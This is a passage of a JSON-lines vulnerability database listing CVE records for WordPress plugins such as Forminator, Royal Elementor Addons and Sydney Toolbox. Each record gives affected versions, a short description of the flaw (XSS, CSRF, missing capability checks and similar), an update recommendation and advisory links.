version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.39.2\\\/assets\\\/forminator-ui\\\/js\\\/forminator-form.js#L888\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.39.2\\\/assets\\\/forminator-ui\\\/js\\\/forminator-form.js#L888\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14043276-ba0a-4862-a1a7-00b4c372c5bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/14043276-ba0a-4862-a1a7-00b4c372c5bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7052","slug":"forminator","versionImpact":"1.38.2","versionEndExcluding":"1.38.3","description":"The Forminator Forms WordPress plugin before 1.38.3 does not sanitise and escape some of its settings, which could allow high privilege users such as Admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.38.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e52cab5-821c-4ca8-9024-67f716cf78fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4e52cab5-821c-4ca8-9024-67f716cf78fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0470","slug":"forminator","versionImpact":"1.38.2","versionEndExcluding":"1.38.3","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the title parameter in all versions up to, and including, 1.38.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.38.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.38.2\\\/requirejs\\\/main.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.38.2\\\/requirejs\\\/main.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3226716%40forminator%2Ftrunk&old=3222217%40forminator%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3226716%40forminator%2Ftrunk&old=3222217%40forminator%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5281d4b-c2cd-4972-b837-e101a8893c6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f5281d4b-c2cd-4972-b837-e101a8893c6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9700","slug":"forminator","versionImpact":"1.36.0","versionEndExcluding":"1.36.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.36.0 via the submit_quizzes() function due to missing validation on the 'entry_id' user controlled key. This makes it possible for unauthenticated attackers to modify other users' quiz submissions.","recommendation":"Update to version 1.36.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbed35ca-1630-46a4-8b1f-60cc7216f294?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbed35ca-1630-46a4-8b1f-60cc7216f294?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.1\\\/library\\\/modules\\\/quizzes\\\/front\\\/front-action.php#L548\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.1\\\/library\\\/modules\\\/quizzes\\\/front\\\/front-action.php#L548\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172942\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3172942\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9352","slug":"forminator","versionImpact":"1.35.1","versionEndExcluding":"1.36.0","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.35.1. This is due to missing or incorrect nonce validation on the custom form 'create_module' function. This makes it possible for unauthenticated attackers to create draft forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.36.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81e6e266-078a-4f4f-a335-c9d388f41ef2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81e6e266-078a-4f4f-a335-c9d388f41ef2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.0\\\/library\\\/modules\\\/custom-forms\\\/admin\\\/admin-loader.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.0\\\/library\\\/modules\\\/custom-forms\\\/admin\\\/admin-loader.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9351","slug":"forminator","versionImpact":"1.35.1","versionEndExcluding":"1.36.0","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.35.1. This is due to missing or incorrect nonce validation on the quiz 'create_module' function. This makes it possible for unauthenticated attackers to create draft quizzes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.36.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d89e3b7-d980-42bb-ab0c-d86ab174a69c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8d89e3b7-d980-42bb-ab0c-d86ab174a69c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.0\\\/library\\\/modules\\\/quizzes\\\/admin\\\/admin-loader.php#L719\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.35.0\\\/library\\\/modules\\\/quizzes\\\/admin\\\/admin-loader.php#L719\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10402","slug":"forminator","versionImpact":"1.35.1","versionEndExcluding":"1.36.0","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.35.1. This makes it possible for authenticated attackers, with Contributor-level access and above, and permissions granted by an Administrator, to create new or edit existing forms, including updating the default registration role to Administrator on User Registration forms.","recommendation":"Update to version 1.36.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1d9d2b-cbdf-4d62-85fe-2616eaf02848?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1d9d2b-cbdf-4d62-85fe-2616eaf02848?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3169243\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10145","slug":"social-pug","versionImpact":"1.34.3","versionEndExcluding":"1.34.4","description":"The Hubbub Lite  WordPress plugin before 1.34.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.34.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9e2381b-3ea0-48fa-bd9c-4181ddf36389\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b9e2381b-3ea0-48fa-bd9c-4181ddf36389\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1502","slug":"ip2location-redirection","versionImpact":"1.33.3","versionEndExcluding":"1.33.4","description":"The IP2Location Redirection plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'download_ip2location_redirection_backup' AJAX action in all versions up to, and including, 1.33.3. This makes it possible for unauthenticated attackers to download the plugin's settings.","recommendation":"Update to version 1.33.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244195%40ip2location-redirection&new=3244195%40ip2location-redirection&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244195%40ip2location-redirection&new=3244195%40ip2location-redirection&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bca41dd8-5bd3-4fee-9f3f-feb8f1a4c687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bca41dd8-5bd3-4fee-9f3f-feb8f1a4c687?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11271","slug":"wp-webinarsystem","versionImpact":"1.33.24","versionEndExcluding":"1.33.25","description":"The WordPress Webinar Plugin \u2013 WebinarPress plugin for WordPress is vulnerable to modification of data due to a missing capability check on several functions in all versions up to, and including, 1.33.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify webinars.","recommendation":"Update to version 1.33.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3216237\\\/wp-webinarsystem\\\/trunk\\\/includes\\\/class-webinarsysteem-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3216237\\\/wp-webinarsystem\\\/trunk\\\/includes\\\/class-webinarsysteem-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88508dbd-b7a0-441d-918b-f4cb7a7cd000?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88508dbd-b7a0-441d-918b-f4cb7a7cd000?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11270","slug":"wp-webinarsystem","versionImpact":"1.33.24","versionEndExcluding":"1.33.25","description":"The WordPress Webinar Plugin \u2013 WebinarPress plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check on the 'sync-import-imgs' function and missing file type validation in all versions up to, and including, 1.33.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files that can lead to remote code execution.","recommendation":"Update to version 1.33.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3216237\\\/wp-webinarsystem\\\/trunk\\\/includes\\\/class-webinarsysteem-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3216237\\\/wp-webinarsystem\\\/trunk\\\/includes\\\/class-webinarsysteem-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1c2cb3f-2f9e-40c5-9e5f-5b85a53e5868?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1c2cb3f-2f9e-40c5-9e5f-5b85a53e5868?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7154","slug":"social-pug","versionImpact":"1.31.1","versionEndExcluding":"1.32.0","description":"The Hubbub Lite (formerly Grow Social) WordPress plugin before 1.32.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.32.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ed423dd-4a38-45e0-8645-3f4215a3f15c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ed423dd-4a38-45e0-8645-3f4215a3f15c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1979","slug":"web-stories","versionEndExcluding":"1.32.0","description":"The Web Stories for WordPress plugin supports the WordPress built-in functionality of protecting content with a password. The content is then only accessible to website visitors after entering the password. In WordPress, users with the \"Author\" role can create stories, but don't have the ability to edit password protected stories. The vulnerability allowed users with said role to bypass this permission check when trying to duplicate the protected story in the plugin's own dashboard, giving them access to the seemingly protected content. We recommend upgrading to version 1.32 or beyond commit\u00a0 ad49781c2a35c5c92ef704d4b621ab4e5cb77d68 https:\/\/github.com\/GoogleForCreators\/web-stories-wp\/commit\/ad49781c2a35c5c92ef704d4b621ab4e5cb77d68 \n","recommendation":"Update to version 1.32.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/GoogleForCreators\\\/web-stories-wp\\\/commit\\\/ad49781c2a35c5c92ef704d4b621ab4e5cb77d68\",\"name\":\"https:\\\/\\\/github.com\\\/GoogleForCreators\\\/web-stories-wp\\\/commit\\\/ad49781c2a35c5c92ef704d4b621ab4e5cb77d68\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/GoogleForCreators\\\/web-stories-wp\\\/releases\\\/tag\\\/v1.32.0\",\"name\":\"https:\\\/\\\/github.com\\\/GoogleForCreators\\\/web-stories-wp\\\/releases\\\/tag\\\/v1.32.0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10535","slug":"video-wc-gallery","versionImpact":"1.31","versionEndExcluding":"1.32","description":"The Video Gallery for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the remove_unused_thumbnails() function in all versions up to, and including, 1.31. This makes it possible for unauthenticated attackers to delete thumbnails in the video-wc-gallery-thumb directory.","recommendation":"Update to version 1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50259040-a984-42a8-8d58-cc94e349ca45?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50259040-a984-42a8-8d58-cc94e349ca45?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-wc-gallery\\\/trunk\\\/admin\\\/admin-ui-setup.php#L545\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-wc-gallery\\\/trunk\\\/admin\\\/admin-ui-setup.php#L545\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182174%40video-wc-gallery&new=3182174%40video-wc-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3182174%40video-wc-gallery&new=3182174%40video-wc-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4473","slug":"sydney-toolbox","versionImpact":"1.31","versionEndExcluding":"1.32","description":"The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"aThemes: Portfolio\" widget in all versions up to, and including, 1.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60f16abd-951b-48a0-a363-0221f7e0957d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60f16abd-951b-48a0-a363-0221f7e0957d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082233\\\/sydney-toolbox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082233\\\/sydney-toolbox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4036","slug":"simple-blog-card","versionEndExcluding":"1.32","description":"The Simple Blog Card WordPress plugin before 1.32 does not ensure that posts to be displayed via a shortcode are public, allowing any authenticated users, such as subscriber, to retrieve arbitrary post title and their content such as draft, private and password protected ones","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de3e1718-c358-4510-b142-32896ffeb03f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de3e1718-c358-4510-b142-32896ffeb03f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0623","slug":"vk-block-patterns","versionImpact":"1.31.1.1","versionEndExcluding":"1.31.2.0","description":"The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.31.2.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4036","slug":"sydney-toolbox","versionImpact":"1.30","versionEndExcluding":"1.31","description":"The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the style parameter in all versions up to, and including, 1.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6d5275d-43d0-41f6-96c7-e7646eac4534?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6d5275d-43d0-41f6-96c7-e7646eac4534?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-employee.php#L346\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-employee.php#L346\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075394%40sydney-toolbox%2Ftrunk&old=3064481%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075394%40sydney-toolbox%2Ftrunk&old=3064481%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4035","slug":"simple-blog-card","versionEndExcluding":"1.31","description":"The Simple Blog Card WordPress plugin before 1.31 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fd9192a-2d08-4127-adcd-87fb1ea8d6fc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fd9192a-2d08-4127-adcd-87fb1ea8d6fc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7417","slug":"royal-elementor-addons","versionImpact":"1.3.986","versionEndExcluding":"1.3.987","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.3.986 via the data_fetch. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract data from password protected posts.","recommendation":"Update to version 1.3.987, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3dfb0b7-5d9f-492b-9a1a-d4445d39c00c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3dfb0b7-5d9f-492b-9a1a-d4445d39c00c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162784\\\/royal-elementor-addons\\\/tags\\\/1.3.987\\\/classes\\\/modules\\\/wpr-ajax-search.php?old=3141814&old_path=royal-elementor-addons%2Ftags%2F1.3.985%2Fclasses%2Fmodules%2Fwpr-ajax-search.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162784\\\/royal-elementor-addons\\\/tags\\\/1.3.987\\\/classes\\\/modules\\\/wpr-ajax-search.php?old=3141814&old_path=royal-elementor-addons%2Ftags%2F1.3.985%2Fclasses%2Fmodules%2Fwpr-ajax-search.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.985\\\/classes\\\/modules\\\/wpr-ajax-search.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.985\\\/classes\\\/modules\\\/wpr-ajax-search.php#L21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8482","slug":"royal-elementor-addons","versionImpact":"1.3.986","versionEndExcluding":"1.3.987","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 1.3.982 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.987, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ccece54-18fa-42e4-ba1a-d0879b73d66d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ccece54-18fa-42e4-ba1a-d0879b73d66d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/team-member\\\/widgets\\\/wpr-team-member.php#L1746\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/team-member\\\/widgets\\\/wpr-team-member.php#L1746\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.987\\\/modules\\\/team-member\\\/widgets\\\/wpr-team-member.php?rev=3162784\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.987\\\/modules\\\/team-member\\\/widgets\\\/wpr-team-member.php?rev=3162784\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5818","slug":"royal-elementor-addons","versionImpact":"1.3.980","versionEndExcluding":"1.3.981","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored DOM-based Cross-Site Scripting via the plugin's Magazine Grid\/Slider widget in all versions up to, and including, 1.3.980 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.981, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a0150d-a9fa-4cc2-8fe8-a429747a9964?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83a0150d-a9fa-4cc2-8fe8-a429747a9964?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121073\\\/royal-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3121073\\\/royal-elementor-addons\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4489","slug":"royal-elementor-addons","versionImpact":"1.3.976","versionEndExcluding":"1.3.977","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018custom_upload_mimes\u2019 function in versions up to, and including, 1.3.976 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.977, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57bf222b-5f49-46e2-be84-3e6444807096?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57bf222b-5f49-46e2-be84-3e6444807096?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.973\\\/admin\\\/templates-kit.php#L896\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.3.973\\\/admin\\\/templates-kit.php#L896\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097775\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097775\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
